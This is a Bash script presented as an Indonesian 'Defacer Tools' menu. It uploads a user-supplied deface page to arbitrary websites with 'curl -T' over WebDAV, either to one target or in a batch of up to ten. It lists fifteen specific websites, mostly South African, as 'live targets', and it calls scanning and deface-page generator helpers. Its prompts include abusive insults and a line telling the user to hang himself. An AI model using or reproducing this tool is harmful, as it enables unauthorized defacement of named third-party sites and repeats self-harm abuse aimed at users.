green="\033[32;1m"
yellow="\033[33;1m"
indigo="\033[34;1m"
red="\033[31;1m"
white="\033[37;1m"
cyan="\033[36;1m"
clear
echo
echo
echo
echo
echo
echo
toilet -f future "    Defacer Tools" | lolcat
echo
echo $white "╭─"$yellow"WELLCOME TO MY TOOLS"$cyan" ~/Masukan Nama/Nick Anda Di Bawah!!!"$white
read -p " ╰─$ " kontol
echo
echo
echo
echo
echo
if [ $kontol =  ] || [ $kontol =  ]
then
clear
echo
echo
echo
echo
echo
echo $red"        Kan udah gue bilang isi dengan nama/nick lu njing!"
sleep 1
echo
echo $red"               Ngeyel sih lu jadi orang bngsat!"
sleep 2
echo
sleep 1
echo $red"          Mending lu mati aja sonoh njing gantung diri"
echo
echo
echo
echo
exit
echo
echo
echo
echo
fi
clear
echo
echo
echo
echo
echo $red"    Haloo"$green" $kontol"$red" Selamat Datang Di Tools Defacer"
sleep 4
clear
echo
echo
echo
echo
echo
echo $red"##########################$green" WELCOME "$red###########################"
echo
figlet -f future "ALI ATTACKER" | lolcat
echo
echo $red"##########################$green" WELCOME "$red###########################"
echo
echo $indigo"	~"$cyan"{"$white"01"$cyan"}"$green"."$yellow"Tebas Index"$cyan
echo $indigo"        ~"$cyan"{"$white"02"$cyan"}"$green"."$yellow"Web Scan"$cyan
echo $indigo"	~"$cyan"{"$white"03"$cyan"}"$green"."$yellow"Auto Deface"$cyan
echo $indigo"	~"$cyan"{"$white"04"$cyan"}"$green"."$yellow"Tools Installer"$cyan
echo $indigo"	~"$cyan"{"$white"05"$cyan"}"$green"."$yellow"Bikin Script Deface"$cyan
echo
echo $red"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo
echo $indigo"  +"$cyan"{"$white"T"$cyan"}"$white"."$green"TUTORIAL & LIVE TARGET"$indigo"      +"$cyan"{"$white"I"$cyan"}"$green"Info"$indigo"      +"$cyan"{"$white"Q"$cyan"}"$green"Quit"$cyan
echo $red"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo $indigo"=============================================================="
echo $white "╭─"$yellow"Mr@Kintil"$cyan" ~/$kontol"$white
read -p " ╰─$ "  memek
echo
if [ $memek = "01" ] || [ $memek = "1" ]
then
echo
echo
echo
clear
echo
echo
echo
echo
toilet -f future "Deface Tebas Index" | lolcat
echo
echo $red "Simpan SC Di Memory Internal Di Luar Folder "
echo
echo $yellow "Live Target"
echo $white "http://contsol.co.za"
echo $cyan "http://colourfactory.co.za"
echo $white "http://chillibitez.co.za"
echo $cyan "http://chasingfantasia.com"
echo $white "http://centraltech.co.za"
echo $cyan "http://cblandscapes.co.za"
echo $white "http://crimsonmonkeyweb.com"
echo $cyan "http://kevinbutho.com"
echo $white "http://prorepafrica.com"
echo $cyan "http://xposurephotography.co.za"
echo $white "http://windmillsandporcupines.co.za"
echo $cyan "http://tcnig.co.za"
echo $white "http://techdirect.co.za"
echo $cyan "http://thehellenic.co.za"
echo $white "http://valdicare.co.za"
echo
echo "    Masukan Script Deface!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Kalo Mau Tebas Index Namai SC index.html"$white                               
read -p " ╰─$ " script
echo
echo
echo $white"  Masukan Target !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Got Hacked!!!"$white
read -p " ╰─$ " target
curl -T /storage/emulated/0/$script $target
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target"
echo
echo
echo $red"Kalo berhasil ke tebas akses url sperti biasa"
echo $green"Tapi kalo tidak berhasil ke tebas pakai nama SC di belakangnya"
echo $yellow"Contoh: http://target.com/$kontol.html"
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi

if [ $memek = "02" ] || [ $memek = "2" ]
then
echo
echo
echo
clear
echo
echo
echo
cd Files
php kamu.php
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi

if [ $memek = "03" ] || [ $memek = "3" ]
then
clear
echo
echo
echo
echo $red"##############################################################"
echo
echo $cyan"Note"$white":"$green" Klik CTRL+C Untuk Keluar Jika Tidak Mau melanjutkan Lagi"
echo $yellow"   Dork Sama Seperti Webdav Cari Dork Nya Di Google Banyak!"
echo
echo $red"##############################################################"
echo
toilet -f future "Wellcome to my tools" | lolcat
echo
toilet -f small "$kontol" | lolcat
echo
echo $red"##############################################################"
echo
echo
echo
echo "    Masukan Script Deface!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Kalo Mau Tebas Index Namai SC index.html"$white                               
read -p " ╰─$ " script
echo
echo
echo $white"  Masukan Target 1 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target1
curl -T /storage/emulated/0/$script $target1
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target1"
echo
echo $white"  Masukan Target 2 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target2
curl -T /storage/emulated/0/$script $target2
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target2"
echo
echo $white"  Masukan Target 3 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target3
curl -T /storage/emulated/0/$script $target3
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target3"
echo
echo $white"  Masukan Target 4 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target4
curl -T /storage/emulated/0/$script $target4
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target4"
echo $white"  Masukan Target 5 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target5
curl -T /storage/emulated/0/$script $target5
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target5"
echo
echo $white"  Masukan Target 6 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target6
curl -T /storage/emulated/0/$script $target6
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target6"
echo
echo $white"  Masukan Target 7 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target7
curl -T /storage/emulated/0/$script $target7
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target7"
echo
echo $white"  Masukan Target 8 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target8
curl -T /storage/emulated/0/$script $target8
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target8"
echo
echo $white"  Masukan Target 9 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target9
curl -T /storage/emulated/0/$script $target9
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target9"
echo $white"  Masukan Target 10 !!!!"
echo $white "╭─"$green"Mr@Kintil"$cyan" ~/Defacer"$white
read -p " ╰─$ " target10
curl -T /storage/emulated/0/$script $target10
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target10"
echo
echo $red"Kalo berhasil ke tebas akses url sperti biasa"
echo $green"Tapi kalo tidak berhasil ke tebas pakai nama SC di belakangnya"
echo $yellow"Contoh: http://target.com/$kontol.html"
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi




if [ $memek = "04" ] || [ $memek = "4" ]
then
echo
echo
echo
clear
echo
echo
echo
cd Files
sh install
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi



if [ $memek = "05" ] || [ $memek = "5" ]
then
clear
echo
echo
echo
echo
echo
echo
cd Files
python2 create.py
echo
mv -f index.html /storage/emulated/0/
echo
clear
echo
echo $green"Nama SC index.html Cari di memory internal!!!"
echo
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi



if [ $memek = "I" ] || [ $memek = "i" ]
then
echo
echo
echo
clear
echo
echo
echo
echo
toilet -f future "   Informasi Tools" | lolcat
echo $red"##########################$green" WELCOME "$red###########################"
echo $green"Author     "$white":"$cyan" ImamIlyasa			"
echo $green"Gthub      "$white":"$cyan" https://github.com/ImamIlyasa12"
echo $green"Website    "$white":"$cyan" https://imamilyasa.blogspot.com/"
echo
echo $yellow"                          THANKS TO :"
echo
echo $cyan"[+] ./Z3X_ID"
echo $cyan"[+] BCS "
echo $cyan"[+] ./Z5X_ID+./Z3X_ID (BCS)"
echo
echo $red   "                     THANKS TO MY FRIEND:"
echo
echo $cyan"[+] MR.JACK"
echo $cyan"[+] MR.SAT"
echo $cyan"[+] Mr.Kandol"
echo $cyan"[+] ME.CH3N"
echo
echo $red"##########################$green" WELCOME "$red###########################"
echo $indigo"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi

if [ $memek = "T" ] || [ $memek = "t" ]
then
cat tutorial.txt
echo
echo $indigo"["$red"B"$indigo"]"$white"back "$indigo"["$red"Q"$indigo"]"$white"Quit"
read -p "[B/Q] " bangsat
fi

if [ $apaan = "Q" ] || [ $apaan = "q" ]
then
echo $red " Terimakasih $kontol Sudah Menggunakan Tools Kami :) "
exit
clear
fi


if [ $bangsat = "B" ] || [ $bangsat = "b" ]
then
sh 77
fi

if [ $bangsat = "Q" ] || [ $bangsat = "q" ]
then
echo $red " Terimakasih $kontol Sudah Menggunakan Tools Kami :) "
exit
clear
fi
